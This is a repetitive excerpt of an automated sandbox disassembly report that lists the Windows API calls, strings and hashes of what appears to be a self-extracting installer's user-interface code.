                                                                                • MulDiv.KERNEL32(00000000,00000064,00000060), ref: 00403B0D
                                                                                • GetObjectW.GDI32(?,00000018,?), ref: 00403B44
                                                                                • MulDiv.KERNEL32(?,00000003,00000002), ref: 00403B51
                                                                                • MulDiv.KERNEL32(?,00000003,00000002), ref: 00403B5D
                                                                                • CreateCompatibleDC.GDI32(?), ref: 00403B6B
                                                                                • CreateCompatibleDC.GDI32(?), ref: 00403B73
                                                                                • SelectObject.GDI32(00000002,?), ref: 00403B83
                                                                                • CreateCompatibleBitmap.GDI32(?,?,?), ref: 00403B91
                                                                                • SelectObject.GDI32(00000000,00000000), ref: 00403B99
                                                                                • SetStretchBltMode.GDI32(00000000,00000004), ref: 00403BA1
                                                                                • StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000002,00000000,00000000,?,?,00CC0020), ref: 00403BC0
                                                                                • GetCurrentObject.GDI32(00000000,00000007), ref: 00403BC9
                                                                                • SelectObject.GDI32(00000002,?), ref: 00403BD8
                                                                                • SelectObject.GDI32(00000000,?), ref: 00403BDE
                                                                                • DeleteDC.GDI32(00000002), ref: 00403BE9
                                                                                • DeleteDC.GDI32(00000000), ref: 00403BEC
                                                                                • ReleaseDC.USER32(00000000,?), ref: 00403BF2
                                                                                • ReleaseDC.USER32(00000000,?), ref: 00403C01
                                                                                • CopyImage.USER32(?,00000000,00000000,00000000,00000000), ref: 00403C0E
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd
                                                                                Similarity
                                                                                • API ID: Object$Select$CompatibleCreate$DeleteReleaseStretch$BitmapCapsCopyCurrentDeviceImageModeWindow
                                                                                • String ID:
                                                                                • API String ID: 3462224810-0
                                                                                • Opcode ID: 82980da23295317485c8058d9f32326a8285abc7e5f11a3e30116cecc0f103df
                                                                                • Instruction ID: a0072e5f292db19c94c8224914de7ba953a02d223df6358cf2059d22beae88df
                                                                                • Opcode Fuzzy Hash: 82980da23295317485c8058d9f32326a8285abc7e5f11a3e30116cecc0f103df
                                                                                • Instruction Fuzzy Hash: AE410675C01218BFDF129FE1DC49EEEBF79EB08365F108066F600B2161C7764A60AB65
                                                                                APIs
                                                                                  • Part of subcall function 00411B60: ??2@YAPAXI@Z.MSVCRT(00000008,?,00406196,?,00000000), ref: 00411B68
                                                                                • lstrlenW.KERNEL32(00920E58,?,0041E138,?,?,?,?,?,?,?,?,?,?,?,004066C2,?), ref: 0040177F
                                                                                  • Part of subcall function 004030D4: lstrlenW.KERNEL32(0041AA80,?,00920E56,?,0041E7B8,004017EC), ref: 004030E3
                                                                                  • Part of subcall function 004030D4: lstrlenW.KERNEL32(00920E58,?,0041E7B8,004017EC,?,?,?,?,?,?,?,?,?,?,?,004066C2), ref: 004030E8
                                                                                  • Part of subcall function 004030D4: _wcsnicmp.MSVCRT ref: 004030F1
                                                                                • _wtol.MSVCRT ref: 0040195A
                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,004066C2,?,00000000), ref: 00401A24
                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 00401A6A
                                                                                • ??3@YAXPAX@Z.MSVCRT(?,00000001,?,?,?,00920E52,00000001), ref: 00401A93
                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,?,00000000), ref: 00401A72
                                                                                  • Part of subcall function 00405051: ??3@YAXPAX@Z.MSVCRT(?,?,0041ADC8,?,?,?,00000000), ref: 004050B8
                                                                                  • Part of subcall function 00405051: ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000), ref: 004050C1
                                                                                  • Part of subcall function 00405051: ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,00000000), ref: 004050C9
                                                                                  • Part of subcall function 00411B84: memcpy.MSVCRT(?,?,00000002,00000000,?,?,00000000,004050A0,0041ADC8,?,?,?,00000000), ref: 00411BAA
                                                                                  • Part of subcall function 00411A27: memcpy.MSVCRT(?,?,?,?,00920E56,00920E52,0041E7B8,00401ACD,?,?,00920E52,00000001), ref: 00411A4A
                                                                                  • Part of subcall function 00411BE5: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,?,?,?,00405076,?,00000000), ref: 00411C17
                                                                                  • Part of subcall function 00411BE5: ??3@YAXPAX@Z.MSVCRT(?,00000000,00000000,?,?,?,00405076,?,00000000), ref: 00411C20
                                                                                  • Part of subcall function 00411BE5: memcpy.MSVCRT(?,00000000,?,?,?,?,00405076,?,00000000), ref: 00411C38
                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00920E52,00000001), ref: 00401ADB
                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,00920E52,00000001), ref: 00401AE3
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd
                                                                                Similarity
                                                                                • API ID: ??3@$lstrlenmemcpy$??2@$_wcsnicmp_wtol
                                                                                • String ID: BeginPromptTimeout$GUIFlags$GUIMode$MiscFlags$OverwriteMode$SelfDelete$SfxVarCmdLine1$SfxVarCmdLine2$bpt
                                                                                • API String ID: 2996597252-1537130225
                                                                                • Opcode ID: ad5e06bf1efe9115dcaa34b549b77952ed5be3fd3def1db1c45ef10eeb062460
                                                                                • Instruction ID: 802da4c3352fe68454c51109ac8192462bb21426cb5da7d8071438425f36007c
                                                                                • Opcode Fuzzy Hash: ad5e06bf1efe9115dcaa34b549b77952ed5be3fd3def1db1c45ef10eeb062460
                                                                                • Instruction Fuzzy Hash: 2FA19231A012018ADB28EB52C5555FEB7B5AF41344B64C43FE842B32F5EB3CAA85C75E
                                                                                APIs
                                                                                  • Part of subcall function 00407ABB: GetDlgItem.USER32(?,?), ref: 00407AC8
                                                                                  • Part of subcall function 00407ABB: ShowWindow.USER32(00000000,?), ref: 00407ADF
                                                                                • GetDlgItem.USER32(?,000004B8), ref: 00409447
                                                                                • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00409456
                                                                                • GetDlgItem.USER32(?,000004B4), ref: 0040947D
                                                                                  • Part of subcall function 00407A0F: SetWindowTextW.USER32(00000000,00000000), ref: 00407A17
                                                                                  • Part of subcall function 00408946: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0040897E
                                                                                  • Part of subcall function 00408946: GetDlgItem.USER32(?,000004B8), ref: 004089A2
                                                                                  • Part of subcall function 00408946: SendMessageW.USER32(00000000,00000402,00000000,00000000), ref: 004089AF
                                                                                  • Part of subcall function 00408946: wsprintfW.USER32 ref: 004089CF
                                                                                  • Part of subcall function 00408946: GetDlgItem.USER32(?,000004B5), ref: 004089ED
                                                                                  • Part of subcall function 00408946: ??3@YAXPAX@Z.MSVCRT(?), ref: 00408A7B
                                                                                  • Part of subcall function 00408F3F: GetModuleHandleW.KERNEL32(00000000,00000065,000004B7,?,?,?,?,?,0040932F), ref: 00408F69
                                                                                  • Part of subcall function 00408F3F: LoadIconW.USER32(00000000), ref: 00408F6C
                                                                                  • Part of subcall function 00408F3F: GetSystemMetrics.USER32(00000032), ref: 00408F80
                                                                                  • Part of subcall function 00408F3F: GetSystemMetrics.USER32(00000031), ref: 00408F85
                                                                                  • Part of subcall function 00408F3F: GetModuleHandleW.KERNEL32(00000000,00000065,00000001,00000000,?,?,?,?,?,0040932F), ref: 00408F8E
                                                                                  • Part of subcall function 00408F3F: LoadImageW.USER32(00000000), ref: 00408F91
                                                                                  • Part of subcall function 00408F3F: SendMessageW.USER32(?,00000080,00000001,?), ref: 00408FB1
                                                                                  • Part of subcall function 00408F3F: SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00408FBA
                                                                                  • Part of subcall function 00408F3F: GetDlgItem.USER32(?,000004B2), ref: 00408FD7
                                                                                  • Part of subcall function 00408F3F: GetDlgItem.USER32(?,000004B2), ref: 00408FE1
                                                                                  • Part of subcall function 00408F3F: GetWindowLongW.USER32(?,000000F0), ref: 00408FED
                                                                                  • Part of subcall function 00408F3F: SetWindowLongW.USER32(000000F0,000000F0,00000000), ref: 00408FFC
                                                                                  • Part of subcall function 00408F3F: GetDlgItem.USER32(?,000004B5), ref: 0040900A
                                                                                  • Part of subcall function 00408F3F: GetDlgItem.USER32(?,000004B5), ref: 00409018
                                                                                  • Part of subcall function 00408F3F: GetWindowLongW.USER32(000000F0,000000F0), ref: 00409024
                                                                                  • Part of subcall function 00408F3F: SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00409033
                                                                                  • Part of subcall function 00408F3F: GetDlgItem.USER32(?,000004B2), ref: 00409040
                                                                                • GetDlgItem.USER32(?,000004B5), ref: 004094A3
                                                                                • GetWindowLongW.USER32(00000000,000000F0), ref: 004094A8
                                                                                • GetDlgItem.USER32(?,000004B5), ref: 004094B8
                                                                                • SetWindowLongW.USER32(00000000), ref: 004094BB
                                                                                • GetSystemMenu.USER32(?,00000000,000004B4,00000000), ref: 004094E1
                                                                                • EnableMenuItem.USER32(00000000,0000F060,00000001), ref: 004094F3
                                                                                • GetDlgItem.USER32(?,000004B4), ref: 004094FD
                                                                                • SetFocus.USER32(00000000), ref: 00409500
                                                                                • SetTimer.USER32(?,00000001,00000000,00000000), ref: 0040952F
                                                                                • CoCreateInstance.OLE32(0041C84C,00000000,00000001,0041BFE4,?), ref: 00409554
                                                                                • GetDlgItem.USER32(?,00000002), ref: 00409575
                                                                                • IsWindow.USER32(00000000), ref: 00409578
                                                                                • GetDlgItem.USER32(?,00000002), ref: 00409588
                                                                                • EnableWindow.USER32(00000000), ref: 0040958B
                                                                                • GetDlgItem.USER32(?,000004B5), ref: 0040959F
                                                                                • ShowWindow.USER32(00000000), ref: 004095A2
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd
                                                                                Similarity
                                                                                • API ID: Item$Window$Long$MessageSend$System$EnableHandleLoadMenuMetricsModuleShow$??3@CreateFocusIconImageInstanceTextTimerUnothrow_t@std@@@__ehfuncinfo$??2@wsprintf
                                                                                • String ID:
                                                                                • API String ID: 957878288-0
                                                                                • Opcode ID: 7faac37edcd208d7f3d635246ce9092851c04d018622aa74b3308d040a587b32
                                                                                • Instruction ID: 91ef2c87c7f5044bd2a8179c9000c8a4a1c30ad634a6280c3a66f42eddf6a5f2
                                                                                • Opcode Fuzzy Hash: 7faac37edcd208d7f3d635246ce9092851c04d018622aa74b3308d040a587b32
                                                                                • Instruction Fuzzy Hash: 794175B4604708BBEA216F26DD49F5B7B9DEB40B04F04843DF955A22E1CB79AC10CB2D
                                                                                APIs
                                                                                  • Part of subcall function 00411743: ??2@YAPAXI@Z.MSVCRT(00000004,0041E844,004065C3,00000000,0041E844,0041E844), ref: 0041174B
                                                                                • ??3@YAXPAX@Z.MSVCRT(?,00000000,0000FDE9,?,00920F20,00000000), ref: 00405197
                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0000FDE9,?,00920F20,00000000), ref: 0040519F
                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?), ref: 0040539D
                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?), ref: 004053A5
                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?), ref: 004053C1
                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0000FDE9,?,00920F20,00000000), ref: 004053E2
                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,0000FDE9,?,00920F20,00000000), ref: 004053EA
                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,0000FDE9,?,00920F20,00000000), ref: 004053F2
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd
                                                                                Similarity
                                                                                • API ID: ??3@$??2@
                                                                                • String ID: SetEnvironment${\rtf
                                                                                • API String ID: 4113381792-318139784
                                                                                • Opcode ID: 0e9b30d454d381ff44a26bf80db0083171be6676ef64e56021da3b2ac69a4e51
                                                                                • Instruction ID: 77d8a904bf1d7ff1cd0baf4dd30aa615c8c5e0bf9e93a58920d719d6b3547280
                                                                                • Opcode Fuzzy Hash: 0e9b30d454d381ff44a26bf80db0083171be6676ef64e56021da3b2ac69a4e51
                                                                                • Instruction Fuzzy Hash: 1C91BC30900609ABDB15DBA1C855BEFBBB1EF14304F2400ABE942772D2DB785E45DF99
                                                                                APIs
                                                                                • GetClassNameA.USER32(?,?,00000040), ref: 00403C2E
                                                                                • lstrcmpiA.KERNEL32(?,STATIC), ref: 00403C45
                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00403C56
                                                                                • GetMenu.USER32 ref: 00403C69
                                                                                  • Part of subcall function 004039F0: GetModuleHandleW.KERNEL32(00000000), ref: 00403A01
                                                                                  • Part of subcall function 004039F0: FindResourceExA.KERNEL32(00000000,?,?), ref: 00403A1F
                                                                                  • Part of subcall function 004039F0: FindResourceExA.KERNEL32(?,?,?,00000409), ref: 00403A36
                                                                                  • Part of subcall function 004039F0: SizeofResource.KERNEL32(?,00000000), ref: 00403A49
                                                                                  • Part of subcall function 004039F0: LoadResource.KERNEL32(?,00000000), ref: 00403A55
                                                                                  • Part of subcall function 004039F0: LockResource.KERNEL32(00000000), ref: 00403A60
                                                                                • GlobalAlloc.KERNEL32(00000040,00000010,?,?,000000F0,?,?,00000040), ref: 00403C96
                                                                                • memcpy.MSVCRT(00000000,00000000,00000010,?,000000F0,?,?,00000040), ref: 00403CAB
                                                                                • CoInitialize.OLE32(00000000), ref: 00403CB4
                                                                                • CreateStreamOnHGlobal.OLE32(00000000,00000000,?), ref: 00403CC0
                                                                                • OleLoadPicture.OLEAUT32(?,00000000,00000000,0041C82C,?), ref: 00403CE5
                                                                                • GlobalFree.KERNEL32(00000000), ref: 00403CF5
                                                                                  • Part of subcall function 00403AD9: GetWindowDC.USER32(00000000), ref: 00403AE8
                                                                                  • Part of subcall function 00403AD9: GetDeviceCaps.GDI32(00000000,00000058), ref: 00403AF4
                                                                                  • Part of subcall function 00403AD9: MulDiv.KERNEL32(00000000,00000064,00000060), ref: 00403B0D
                                                                                  • Part of subcall function 00403AD9: GetObjectW.GDI32(?,00000018,?), ref: 00403B44
                                                                                  • Part of subcall function 00403AD9: MulDiv.KERNEL32(?,00000003,00000002), ref: 00403B51
                                                                                  • Part of subcall function 00403AD9: MulDiv.KERNEL32(?,00000003,00000002), ref: 00403B5D
                                                                                  • Part of subcall function 00403AD9: CreateCompatibleDC.GDI32(?), ref: 00403B6B
                                                                                  • Part of subcall function 00403AD9: CreateCompatibleDC.GDI32(?), ref: 00403B73
                                                                                  • Part of subcall function 00403AD9: SelectObject.GDI32(00000002,?), ref: 00403B83
                                                                                  • Part of subcall function 00403AD9: CreateCompatibleBitmap.GDI32(?,?,?), ref: 00403B91
                                                                                  • Part of subcall function 00403AD9: SelectObject.GDI32(00000000,00000000), ref: 00403B99
                                                                                  • Part of subcall function 00403AD9: SetStretchBltMode.GDI32(00000000,00000004), ref: 00403BA1
                                                                                  • Part of subcall function 00403AD9: StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000002,00000000,00000000,?,?,00CC0020), ref: 00403BC0
                                                                                  • Part of subcall function 00403AD9: GetCurrentObject.GDI32(00000000,00000007), ref: 00403BC9
                                                                                  • Part of subcall function 00403AD9: SelectObject.GDI32(00000002,?), ref: 00403BD8
                                                                                  • Part of subcall function 00403AD9: SelectObject.GDI32(00000000,?), ref: 00403BDE
                                                                                  • Part of subcall function 00403AD9: DeleteDC.GDI32(00000002), ref: 00403BE9
                                                                                  • Part of subcall function 00403AD9: DeleteDC.GDI32(00000000), ref: 00403BEC
                                                                                  • Part of subcall function 00403AD9: ReleaseDC.USER32(00000000,?), ref: 00403BF2
                                                                                • GetObjectW.GDI32(00000000,00000018,?), ref: 00403D25
                                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000006), ref: 00403D39
                                                                                • SendMessageW.USER32(?,00000172,00000000,?), ref: 00403D4B
                                                                                • GlobalFree.KERNEL32(00000000), ref: 00403D60
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd
                                                                                Similarity
                                                                                • API ID: Object$Resource$CreateGlobalSelect$CompatibleWindow$DeleteFindFreeLoadStretch$AllocBitmapCapsClassCurrentDeviceHandleInitializeLockLongMenuMessageModeModuleNamePictureReleaseSendSizeofStreamlstrcmpimemcpy
                                                                                • String ID: IMAGES$STATIC
                                                                                • API String ID: 4202116410-1168396491
                                                                                • Opcode ID: e5ee765c26b043088857a6b86632b5a939f6bbfc1f2247f6f7eb73e9a60df1c7
                                                                                • Instruction ID: 960f2b80fa602a6c7041f941df52aa7033470e9d81684b1270c43c97e0f3439f
                                                                                • Opcode Fuzzy Hash: e5ee765c26b043088857a6b86632b5a939f6bbfc1f2247f6f7eb73e9a60df1c7
                                                                                • Instruction Fuzzy Hash: 28416D71A01218BBCB219FA4CC48DEFBF7DEF09751F108066F515B2290D7398A51DB6A
                                                                                APIs
                                                                                • GetDlgItem.USER32(?,000004B3), ref: 00407BFB
                                                                                • GetWindowLongW.USER32(00000000,000000F0), ref: 00407C00
                                                                                • GetDlgItem.USER32(?,000004B4), ref: 00407C37
                                                                                • GetWindowLongW.USER32(00000000,000000F0), ref: 00407C3C
                                                                                • GetSystemMetrics.USER32(00000010), ref: 00407CBE
                                                                                • GetSystemMetrics.USER32(00000011), ref: 00407CC4
                                                                                • GetSystemMetrics.USER32(00000008), ref: 00407CCB
                                                                                • GetSystemMetrics.USER32(00000007), ref: 00407CD2
                                                                                • GetParent.USER32(?), ref: 00407CF4
                                                                                • GetClientRect.USER32(00000000,?), ref: 00407D06
                                                                                • ClientToScreen.USER32(?,?), ref: 00407D19
                                                                                • SetWindowPos.USER32(?,00000000,?,?,?,00000000,00000004), ref: 00407D7F
                                                                                • GetDlgItem.USER32(?,000004B1), ref: 00407D9E
                                                                                • SetWindowPos.USER32(00000000), ref: 00407DA5
                                                                                • GetClientRect.USER32(?,?), ref: 00407E25
                                                                                  • Part of subcall function 00407BA4: GetDlgItem.USER32(?,?), ref: 00407BC2
                                                                                  • Part of subcall function 00407BA4: SetWindowPos.USER32(00000000), ref: 00407BC9
                                                                                • ClientToScreen.USER32(?,?), ref: 00407D22
                                                                                  • Part of subcall function 00407A29: GetDlgItem.USER32(?,?), ref: 00407A31
                                                                                • GetSystemMetrics.USER32(00000008), ref: 00407EAA
                                                                                • GetSystemMetrics.USER32(00000007), ref: 00407EB1
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd
                                                                                Similarity
                                                                                • API ID: MetricsSystem$ItemWindow$Client$LongRectScreen$Parent
                                                                                • String ID:
                                                                                • API String ID: 2671006076-0
                                                                                • Opcode ID: 4741c276581009abfc9ca523c20e9ec6d8d94d55c1504a4e144b8b0e00fc264d
                                                                                • Instruction ID: 7001ee707cf972b195794562609621f769ecf2f41514bcadc40e6201da9538ee
                                                                                • Opcode Fuzzy Hash: 4741c276581009abfc9ca523c20e9ec6d8d94d55c1504a4e144b8b0e00fc264d
                                                                                • Instruction Fuzzy Hash: 3CA11A71E04209AFDB10CFBDCD85AAEBBF9EF48704F148529E505F2291D778E9008B65
                                                                                APIs
                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?), ref: 00417768
                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?), ref: 00417770
                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?), ref: 00417778
                                                                                  • Part of subcall function 004156A7: ??3@YAXPAX@Z.MSVCRT(?,00000000,004178C8,?,?,?), ref: 004156AD
                                                                                  • Part of subcall function 004156A7: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,004178C8,?,?,?), ref: 004156B5
                                                                                  • Part of subcall function 004156A7: ??3@YAXPAX@Z.MSVCRT(40000000,?,?,00000000,004178C8,?,?,?), ref: 004156BD
                                                                                  • Part of subcall function 004156A7: ??3@YAXPAX@Z.MSVCRT(?,40000000,?,?,00000000,004178C8,?,?,?), ref: 004156C5
                                                                                  • Part of subcall function 004156A7: ??3@YAXPAX@Z.MSVCRT(?,?,40000000,?,?,00000000,004178C8,?,?,?), ref: 004156CD
                                                                                  • Part of subcall function 004156A7: ??3@YAXPAX@Z.MSVCRT(?,?,?,40000000,?,?,00000000,004178C8,?,?,?), ref: 004156D5
                                                                                  • Part of subcall function 004156A7: ??3@YAXPAX@Z.MSVCRT(?,?,?,?,40000000,?,?,00000000,004178C8,?,?,?), ref: 004156DD
                                                                                  • Part of subcall function 004156A7: ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,40000000,?,?,00000000,004178C8,?,?,?), ref: 004156E5
                                                                                  • Part of subcall function 004156A7: ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,40000000,?,?,00000000,004178C8,?,?,?), ref: 004156ED
                                                                                  • Part of subcall function 004156A7: ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,40000000,?,?,00000000,004178C8,?,?,?), ref: 004156F5
                                                                                  • Part of subcall function 004156A7: ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,40000000,?,?,00000000,004178C8,?,?,?), ref: 004156FD
                                                                                • ??2@YAPAXI@Z.MSVCRT(00000014,?,?,?,?,?), ref: 004177D4
                                                                                  • Part of subcall function 00414DA0: ??3@YAXPAX@Z.MSVCRT(?,00000000,004178A5,?,?), ref: 00414DB3
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
